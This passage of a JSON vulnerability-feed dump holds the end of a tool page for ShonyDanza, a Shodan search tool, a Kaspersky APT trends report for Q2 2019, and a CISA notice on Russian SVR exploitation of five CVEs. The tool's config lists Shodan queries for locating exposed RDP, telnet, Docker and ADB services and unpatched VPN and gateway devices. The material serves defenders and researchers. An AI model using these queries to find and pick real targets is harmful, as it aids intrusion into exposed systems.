#NET_RANGE = '0.0.0.0/0' \"&gt;\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-08-01T10:44:30", "description": "\n\nFor two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact 'intelreports@kaspersky.com'.\n\n## The most remarkable findings\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named 'Tokyo' and 'Yokohama' and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nOn May 14, FT reported that a [zero-day vulnerability in WhatsApp](<https://www.wired.com/story/whatsapp-hack-phone-call-voip-buffer-overflow/>) had been exploited, allowing attackers to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance, such as browsing through a victim's photos and videos, accessing their contact list and more. In order to exploit the vulnerability, the attacker simply needs to call the victim via WhatsApp. This specially crafted call can trigger a buffer overflow in WhatsApp, allowing an attacker to take control of the application and execute arbitrary code in it. Apparently, the attackers used this method to not only snoop on people's chats and calls but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released [patches for the vulnerability](<https://www.facebook.com/security/advisories/cve-2019-3568>) on May 13. Some [have suggested](<https://www.theregister.co.uk/2019/05/14/whatsapp_zero_day/>) that the spyware may be Pegasus, developed by Israeli company NSO.\n\n## Russian-speaking activity\n\nWe continue to track the activities of Russian-speaking APT groups. These groups usually show a particular interest in political activities, but apart from a couple of interesting exceptions we failed to detect any remarkable examples during the last quarter.\n\nWe did find a potential connection between Hades and a leak at the RANA institute. Hades is possibly connected to the Sofacy threat actor, most notable for being behind [Olympic Destroyer](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>), as well as [ExPetr](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) and several disinformation campaigns such as the Macron leaks. Earlier this year, a website named Hidden Reality published leaks allegedly related to an Iranian entity named the RANA institute. This was the third leak in two months that disclosed details of alleged Iranian threat actors and groups. Close analysis of the materials, the infrastructure and the dedicated website used by those behind the leak led us to believe that these leaks might be connected to Hades. This might be part of a disinformation campaign in which Hades helps to raise doubts about the quality of the information leaked in other cases from earlier this year.\n\nZebrocy continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear-phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. The targets of this new Nimcy downloader and backdoor set includes diplomats, defense officials and ministry of foreign affairs staff, from whom they want to steal login credentials, keystrokes, communications, and various files. The group appears to have turned its attention towards the March events involving Pakistan and India, and unrelated diplomatic and military officials, while maintaining ongoing access to local and remote networks belonging to Central Asian governments.\n\nWe also recently observed some interesting new artifacts that we relate to Turla with varying degrees of confidence.\n\nIn April 2019, we observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the original COMpfun is used as a downloader in one of the spreading mechanisms. We called the newly identified modules Reductor after a .pdb path left in some samples. We believe the malware was developed by the same COMPfun authors that, internally, we tentatively associated with the Turla APT, based on victimology. Besides the typical RAT functions (upload, download, execute files), Reductor's authors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The solution used by Reductor's developers to mark TLS traffic is the most ingenious part. The authors don't touch the network packets at all; instead they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the \"client random\" sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this \"client random\" field.\n\nAdditionally we identified a new backdoor that we attribute with medium confidence to Turla. The backdoor, named Tunnus, is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus's activity started last March and was still active at the time of writing.\n\nESET [has also reported](<https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/>) PowerShell scripts being used by Turla to provide direct, in-memory loading and execution of malware. This is not the first time this threat actor [has used PowerShell](<https://securelist.com/shedding-skin-turlas-fresh-faces/88069/>) in this way, but the group has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. The payloads delivered via the PowerShell scripts \u2013 the RPC backdoor and PowerStallion \u2013 are highly customized.\n\nSymantec [has also been tracking targeted attacks](<https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments>) in a series of campaigns against governments and international organizations across the globe over the past 18 months. The attacks have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of infrastructure belonging to OilRig. They have uncovered evidence that the Waterbug APT group (aka Turla, Snake, Uroburos, Venomous Bear and KRYPTON) has conducted a hostile takeover of an attack platform belonging to OilRig (aka [Crambus](<https://arstechnica.com/information-technology/2019/06/researchers-think-nation-sponsored-hackers-attacked-rival-espionage-group/>)). Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government that OilRig had already penetrated. This is not the first time that [we have seen](<https://www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/>) this type of activity. Clearly, operations of this kind make the job of attribution more difficult.\n\nThe international community continues to focus on the activity of Russian-speaking threat actors. Over the last 18 months, the UK has shared information on attacks attributed to Russian hackers with 16 NATO allies, [including attacks](<https://www.zdnet.com/article/uk-says-it-warned-16-nato-allies-of-russian-hacking-activities/>) on critical national infrastructure and attempts to compromise central government networks. In his former capacity as UK foreign secretary, Jeremy Hunt, recently urged nations to band together to create a deterrent for state-sponsored hackers. As part of this push, the UK and its intelligence partners have been slowly moving towards a 'name and shame' approach when dealing with cyberattacks. The use of the 'court of public opinion' in response to cyberattacks is [a trend that we highlighted](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>) in our predictions for 2019. To help this new strategy the EU recently passed new laws that will make it possible for EU member states to impose economic sanctions against foreign hackers.\n\nResearchers at the Microstep Intelligence Bureau [have published a report](<https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=1417>) on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor. Recently, the group launched attacks on a number of state organizations in Ukraine using Pterodo, malware used exclusively by this group. Since February, the attackers have deployed a large number of dynamic domain names and newly registered domain names believed to be used to launch targeted attacks against elections in Ukraine.\n\n## Chinese-speaking activity\n\nWe found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager. The campaign mainly targets government bodies in Central Asia. For persistence, the operators use .DLL search order hijacking. This consists of using a custom decryptor with a system library name (e.g., version.dll or api-ms-win-core-fibers-l1-1-1.dll) in directories, along with the legitimate applications that load these libraries into memory. Among other legitimate applications, the threat actor uses the Google updater, GoogleCrashHandler.exe, for .DLL hijacking. Custom encryptors protect the next stagers from detection on disk and from automated analysis, using the same encryption keys in different samples. For secure TLS communication with its C2, the malware uses the Secure Channel (Schannel) Windows security package.\n\nESET [discovered](<https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/>) that the attackers behind the Plead malware have been distributing it using compromised routers and man-in-the-middle (MITM) attacks in April. Researchers have detected this activity in Taiwan, where the Plead malware has been most actively deployed. Trend Micro [has previously reported](<https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf>) the use of this malware in targeted attacks by the BlackTech group, primarily focused on cyber-espionage in Asia. ESET telemetry has revealed multiple attempts to deploy it.\n\nLuckyMouse activity [detected](<https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/>) by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East, probably exploiting CVE-2019-0604, a remote code execution vulnerability used to compromise the server and eventually install a web shell. The actors uploaded a variety of tools that they used to perform additional activities on the compromised network, such as dumping credentials, as well as locating and pivoting to additional systems on the network. Of particular note is the group's use of tools to identify systems vulnerable to CVE-2017-0144, the vulnerability exploited by EternalBlue and used in the 2017 WannaCry attacks. This activity appears to be related to campaigns exploiting CVE-2019-0604 mentioned in recent security alerts from the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security.\n\nLast year, a number of Chinese hackers allegedly linked to the Chinese government were indicted in the US. In May, the US Department of Justice indicted a Chinese national for a [series of computer intrusions](<https://www.justice.gov/opa/pr/member-sophisticated-china-based-hacking-group-indicted-series-computer-intrusions-including>), including the 2015 data breach of health insurance company Anthem which affected more than 78 million people.\n\n## Middle East\n\nThe last three months have been very interesting for this region, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. Several files were shared via Telegram that supposedly belonged to the OilRig threat actor. They included logins and passwords of several alleged hacking victims, tools, infrastructure details potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18.\n\nThe targeting and TTPs are consistent with this threat actor, but it was impossible to confirm the origins of the tools included in the dump. Assuming that the data in the dump is accurate, it also shows the global reach of the OilRig group, which has generally been thought to operate primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\", for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that \"highly confidential\" information related to MuddyWater would be put up for sale.\n\nOn April 27, three screenshots were posted in the GreenLeakers Telegram channel, containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups.\n\nInterestingly, this leak differed from the others by employing a website that allows anyone to browse the leaked documents. It also relies on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (Computer Network Operations) capabilities, as well as information about victims. Previous leaks were focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers, provided clues that led us to believe Sofacy/Hades may be connected to these leaks.\n\nThere was also other Muddywater activity unrelated to the leak, as well as discoveries linked to previous activity by the group, such as ClearSky's discovery of two domains hacked by MuddyWater at the end of 2018 to host the code of its POWERSTATS malware.\n\nIn April, Cisco Talos [published its analysis](<https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html>) of the BlackWater campaign, related to MuddyWater activity. The campaign shows how the attackers added three distinct steps to their operations, allowing them to bypass certain security controls to evade detection: an obfuscated VBA script to establish persistence as a registry key, a PowerShell stager and FruityC2 agent script, and an open source framework on GitHub to further enumerate the host machine. This could allow the attackers to monitor web logs and determine whether someone outside the campaign has made a request to their server in an attempt to investigate the activity. Once the enumeration commands run, the agent communicates with a different C2 and sends back data in the URL field. Trend Micro also reported MuddyWater's use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3.\n\nWe published a private report about four Android malware families and their use of false flag techniques, among other things. One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government, using compromised legitimate accounts to trick victims into installing malware.\n\nRegarding other groups, we discovered [new activity related to ZooPark](<https://securelist.com/whos-who-in-the-zoo/85394/>), a cyber-espionage threat actor that has focused mainly on stealing data from Android devices. Our new findings include new malicious samples and additional infrastructure that has been deployed since 2016. This also led to us discovering Windows malware implants deployed by the same threat actor. The additional indicators we found shed some light on the targets of past campaigns, including Iranian Kurds \u2013 mainly political dissidents and activists.\n\nRecorded Future [published an analysis](<https://www.recordedfuture.com/iranian-cyber-operations-infrastructure/>) of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations. Following the exposure of a wide range of their infrastructure and operations by Symantec in March, researchers at Recorded Future discovered that APT33, or closely aligned actors, reacted by either parking or reassigning some of their domain infrastructure. The fact that this activity was executed just a day or so after the report went live suggests the Iranian threat actors are acutely aware of the media coverage of their activities and are resourceful enough to be able to react in a quick manner. Since then, the attackers have continued to use a large swath of operational infrastructure, well in excess of 1,200 domains, with many observed communicating with 19 different commodity RAT implants. An interesting development appears to be their increased preference for njRAT, with over half of the observed suspected APT33 infrastructure being linked to njRAT deployment.\n\nOn a more political level, there were several news stories covering Iranian activity.\n\nA group connected to the Iranian Revolutionary Guard [has been blamed](<https://news.sky.com/story/iran-conducted-major-cyber-assault-on-key-uk-infrastructure-11676686>) for a wave of cyber-attacks against UK national infrastructure, including the Post Office, local government networks, private companies and banks. Personal data of thousands of employees were stolen. It is believed that the same group was also responsible for the attack on the UK parliamentary network in 2017. The UK NCSC (National Cyber Security Centre) is providing assistance to affected organizations.\n\nMicrosoft [recently obtained a court order](<https://www.cyberscoop.com/microsoft-uses-court-order-shut-apt-linked-websites/>) in the US to seize control of 99 websites used by the Iranian hacking group APT35 (aka Phosphorus and Charming Kitten). The threat actor used spoofed websites, including those of Microsoft and Yahoo, to conduct cyberattacks against businesses, government agencies, journalists and activists who focus on Iran. The sinkholing of these sites will force the group to recreate part of its infrastructure.\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) [has reported](<https://www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/>) an increase in cyberattacks by Iranian actors or proxies, targeting US industries and government agencies using destructive wiper tools. The statement was posted on Twitter by CISA director, Chris Krebs.\n\n## Southeast Asia and Korean Peninsula\n\nThis quarter we detected a lot of Korean-related activity. However, for the rest of the Southeast Asian region there has not been that much activity, especially when compared to earlier periods.\n\nEarly in Q2, we identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly. Meanwhile, BlueNoroff, the Lazarus sub-group that typically targets financial institutions, targeted a bank in Central Asia and a crypto-currency business in China.\n\nIn a recent campaign, we observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor. ScarCruft is a highly skilled APT group, historically using geo-political issues to target the Korean Peninsula. We found several victims worldwide identified as companies and individuals with ties to North Korea, as well as a diplomatic agency. Interestingly, we observed that ScarCruft continues to adopt publicly available exploit code in its tools. We also found an interesting overlap in a Russian-based victim targeted both by ScarCruft and DarkHotel \u2013 not the first time that we have seen such an overlap.\n\nESET [recently analyzed](<https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/>) a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal. This backdoor shares its features with a previous Mac OS variant, but the structure has changed and detection is now much harder. Researchers were unable to find the dropper associated with this sample, so they could not identify the initial compromise vector.\n\nThe US Department of Homeland Security (DHS) [has reported](<https://www.us-cert.gov/ncas/analysis-reports/AR19-100A>) Trojan variants, identified as HOPLIGHT, being used by the North Korean government. The report includes an analysis of nine malicious executable files. Seven of them are proxy applications that mask traffic between the malware and the remote operators. The proxies have the ability to generate fake TLS handshake sessions using valid public SSL certificates, disguising network connections with remote malicious actors. One file contains a public SSL certificate and the payload of the file appears to be encoded with a password or key. The remaining file does not contain any of the public SSL certificates, but attempts outbound connections and drops four files: the dropped files primarily contain IP addresses and SSL certificates.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia. The threat actor behind the campaign, which [we believe to be the PLATINUM APT group](<https://securelist.com/platinum-is-back/91135/>), uses an elaborate, previously unseen, steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It's also interesting that the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular.\n\n## Other interesting discoveries\n\nOn May 14, Microsoft [released fixes](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) for a critical Remote Code Execution vulnerability (CVE-2019-0708) in Remote Desktop Services (formerly known as Terminal Services) that affects some older versions of Windows: Windows 7, Windows Server 2008 R2, Windows Server 2008 and some unsupported versions of Windows \u2013 including Windows 2003 and Windows XP. Details on how to mitigate this vulnerability are available in our private report 'Analysis and detection guidance for CVE-2019-0708'. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is 'wormable', meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way that WannaCry spread. Microsoft has not observed exploitation of this vulnerability, but believes it is highly likely that malicious actors will write an exploit for it.\n\nEarly in June, researchers at Malwarebytes Labs [observed](<https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/>) a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers. Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn't always the case. Some websites either use Amazon's cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket. Without properly validating externally loaded content, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, researchers found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs. CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics. The sites they identified had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.\n\nDragos has reported that XENOTIME, the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017, [has expanded](<https://threatpost.com/trisis-physical-destruction-electric-companies/145712/>) its focus beyond the oil and gas industries. Researchers have recently seen the group probing the networks of electric utility organizations in the US and elsewhere \u2013 perhaps as a precursor to a dangerous attack on critical infrastructure that could potentially cause physical damage or loss of life. Dragos first noticed the shift in targeting in late 2018; and the attacks have continued into 2019.\n\nWe [recently reported](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) on the latest versions of FinSpy for Android and iOS, developed in mid-2018. This surveillance software is sold to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. WikiLeaks first discovered the implants for desktop devices in 2011 and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It would seem that the iOS solution doesn't provide infection exploits for its customers: the product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. This might imply that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we haven't observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims may be much higher.\n\n## Final thoughts\n\nAPT activity in the Middle East has been particularly interesting this quarter, not least because of the leaks related to alleged Iranian activity. This is especially interesting because one of those leaks might have been part of a disinformation campaign carried out with the help of the Sofacy/Hades threat actor.\n\nIn contrast to earlier periods, when Southeast Asia was the most active region for APTs, the activities we detected this quarter were mainly Korean-related. For the rest of the region, it was a much quieter quarter.\n\nAcross all regions, geo-politics remains the principal driver of APT activity.\n\nIt is also clear from our FinSpy research that there is a high demand for 'commercial' malware from governments and law enforcement agencies.\n\nOne of the most noteworthy aspects of the APT threat landscape we reported this quarter was our discovery of TajMahal, a previously unknown and technically sophisticated APT framework that has been in development for at least five years. This full-blown spying framework includes up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we've ever seen for an APT toolset.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-08-01T10:00:05", "type": "securelist", "title": "APT trends report Q2 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-3568"], "modified": "2019-08-01T10:00:05", "id": "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "href": "https://securelist.com/apt-trends-report-q2-2019/91897/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-09-29T18:14:37", "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": 